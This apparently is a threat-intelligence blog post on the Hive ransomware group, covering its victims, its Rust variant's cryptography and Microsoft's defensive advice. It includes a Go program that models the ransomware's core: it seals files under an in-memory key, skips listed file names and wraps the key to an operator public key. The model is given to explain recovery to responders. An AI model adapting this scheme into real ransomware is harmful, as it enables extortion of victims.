Cybersecurity Snapshots #34 - Hive Ransomware Group

Hive ransomware was first observed in June 2021, and the Hive ransomware group is believed to be based in Russia. Since then it has grown into one of the most prevalent ransomware payloads in the Ransomware as a Service (RaaS) ecosystem. According to the Palo Alto Networks Incident Response Report, the group is now one of the top three active ransomware gangs. Analysis by the company's Unit 42 division found that Hive was responsible for 8% of observed ransomware attacks between May 2021 and April 2022, despite only emerging in mid-2021. Between August 1, 2021 and February 28, 2022, researchers at Trend Micro detected Hive ransomware on 1,264 machines. The ten countries most targeted by the Hive ransomware gang in 2021 were Argentina (312), Brazil (216), United States (160), Thailand (127), Italy (89), Spain (67), Colombia (56), France (48), Saudi Arabia (41), and El Salvador (36). The ten sectors most targeted in 2021 were Energy (186), Healthcare (125), Financial (102), Media (55), Education (38), Materials (31), Manufacturing (30), Telecommunications (13), Technology (11), and Government (8). The Hive ransomware gang continues to infect many organizations with its ransomware.

Hive ransomware victims include Costa Rica's public health service; MediaMarkt, the largest European consumer electronics retailer; Emil Frey, one of Europe's largest car dealers; Indonesian gas giant Perusahaan Gas Negara; the US-based healthcare organizations Partnership HealthPlan, Memorial Healthcare System, and Empress EMS (Emergency Medical Services); the New York Racing Association (NYRA); Bell Technical Solutions (BTS), a subsidiary of Bell Canada; and multiple organizations running vulnerable Microsoft Exchange servers.

Recently the Hive ransomware gang released a new variant of its ransomware. The main difference between the new Hive variant and the old one is the programming language used: the old variant was written in Go (also referred to as Golang), while the new variant is written in Rust. Security researchers at Microsoft noted that Hive gains several advantages from Rust: the language has several mechanisms for concurrency and parallelism, enabling fast and safe file encryption; it has a good variety of cryptographic libraries; and it is relatively more difficult to reverse-engineer. The new variant also encrypts its strings, which can make it more evasive. The researchers noted that the most interesting change in the new variant is its cryptography mechanism. It uses a different set of algorithms: Elliptic Curve Diffie-Hellman (ECDH) over Curve25519 for key agreement, and XChaCha20-Poly1305 (the XChaCha20 stream cipher combined with the Poly1305 authenticator, an authenticated encryption construction) for symmetric encryption. The new Hive variant also takes a different approach to key handling. Instead of embedding an encrypted key in each file it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts the key sets and writes them to the root of the drive being encrypted, both with a .key extension. Only after both key files are written to disk does the multi-threaded file encryption start. Before encrypting each file, the malware checks the file's name and extension against a list of strings; if there is a match, the file is skipped. For responders, the consequence is that the .key files at the drive root are the only on-disk artefacts tied to the file keys, since no key material is stored in the encrypted files themselves.
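To make the key-handling design concrete, the following Go program is an added worked example, not code from Hive or from Microsoft's analysis. It models the scheme described above on in-memory buffers only: a file key is generated in memory, every file whose name does not match a skip list is sealed under it, the key is wrapped to an operator public key via X25519 key agreement and written out as a .key-style structure, and recovery is only possible with the operator's private key. Everything beyond that outline is an assumption of the example: AES-256-GCM stands in for XChaCha20-Poly1305 (which is not in Go's standard library), SHA-256 of the shared secret stands in for a proper KDF, the skip list is constructed and not Hive's real one, a single key set is used where the page describes two, and the function and type names are the example's own. It needs Go 1.20 or later for crypto/ecdh.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"strings"
)

// must panics on errors the encrypting side cannot recover from (CSPRNG failure, malformed embedded key).
func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// Constructed skip list (not Hive's real one): strings each file name is checked against.
var skipList = []string{".exe", ".dll", ".sys", ".key", "bootmgr", "ntldr"}

func shouldSkip(name string) bool {
	n := strings.ToLower(name)
	for _, s := range skipList {
		if strings.Contains(n, s) {
			return true
		}
	}
	return false
}

// AES-256-GCM stands in for XChaCha20-Poly1305, which Go's standard library lacks.
// seal returns nonce||ciphertext||tag; open reverses it and fails under any other key.
func gcm(key []byte) cipher.AEAD {
	return must(cipher.NewGCM(must(aes.NewCipher(key))))
}
func seal(key, plaintext []byte) []byte {
	aead := gcm(key)
	nonce := make([]byte, aead.NonceSize())
	must(rand.Read(nonce))
	return aead.Seal(nonce, nonce, plaintext, nil)
}
func open(key, blob []byte) ([]byte, error) {
	aead := gcm(key)
	ns := aead.NonceSize()
	if len(blob) < ns {
		return nil, errors.New("truncated blob")
	}
	return aead.Open(nil, blob[:ns], blob[ns:], nil)
}

// KeyFile models the ".key" artefact written to the drive root: the ephemeral X25519 public
// key plus the file key sealed under SHA-256 of the ECDH shared secret (a stand-in for a KDF).
type KeyFile struct{ EphemeralPub, SealedKey []byte }

// encryptRun models one execution: a file key generated in memory, every file not on the skip
// list sealed under it, then the key wrapped to the operator's public key. The page describes
// two key sets; one suffices to show the scheme. Nothing here is reversible without the private key.
func encryptRun(operatorPub *ecdh.PublicKey, files map[string][]byte) (KeyFile, map[string][]byte) {
	fileKey := make([]byte, 32)
	must(rand.Read(fileKey))
	enc := make(map[string][]byte)
	for name, data := range files {
		if !shouldSkip(name) {
			enc[name] = seal(fileKey, data)
		}
	}
	eph := must(ecdh.X25519().GenerateKey(rand.Reader))
	wrap := sha256.Sum256(must(eph.ECDH(operatorPub)))
	return KeyFile{eph.PublicKey().Bytes(), seal(wrap[:], fileKey)}, enc
}

// decryptRun is the operator-side recovery: redo the ECDH with the private key, open the
// key file, then open each file. Any other private key fails the AEAD tag check.
func decryptRun(operatorPriv *ecdh.PrivateKey, kf KeyFile, enc map[string][]byte) (map[string][]byte, error) {
	ephPub, err := ecdh.X25519().NewPublicKey(kf.EphemeralPub)
	if err != nil {
		return nil, err
	}
	shared, err := operatorPriv.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	wrap := sha256.Sum256(shared)
	fileKey, err := open(wrap[:], kf.SealedKey)
	if err != nil || len(fileKey) != 32 {
		return nil, errors.New("cannot unwrap key file: wrong operator key or corrupt file")
	}
	out := make(map[string][]byte)
	for name, blob := range enc {
		pt, err := open(fileKey, blob)
		if err != nil {
			return nil, err
		}
		out[name] = pt
	}
	return out, nil
}
```

The point for a responder is visible in decryptRun: the .key structure carries an ephemeral public key and a sealed blob, and without the operator's private scalar the AEAD tag check on that blob fails, so the file key, and therefore every encrypted file, is unrecoverable from the artefacts left on disk. Preserving the .key files still matters, since a decryptor released later (or a seized private key) needs exactly those bytes.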

The Hive ransomware group is expected to remain one of the most active ransomware groups this year, so organizations need to be aware of Hive ransomware. The security researchers at Microsoft noted several key measures that reduce an organization's exposure to ransomware. Organizations should enforce good credential hygiene and audit for credential exposure. They should also prioritize deploying Active Directory updates and hardening their cloud environments. The researchers noted that organizations should enforce MFA on all accounts, remove any users excluded from MFA, and strictly require MFA from all devices, in all locations, at all times. They also suggest enabling passwordless authentication methods and disabling legacy authentication protocols, which cannot enforce MFA.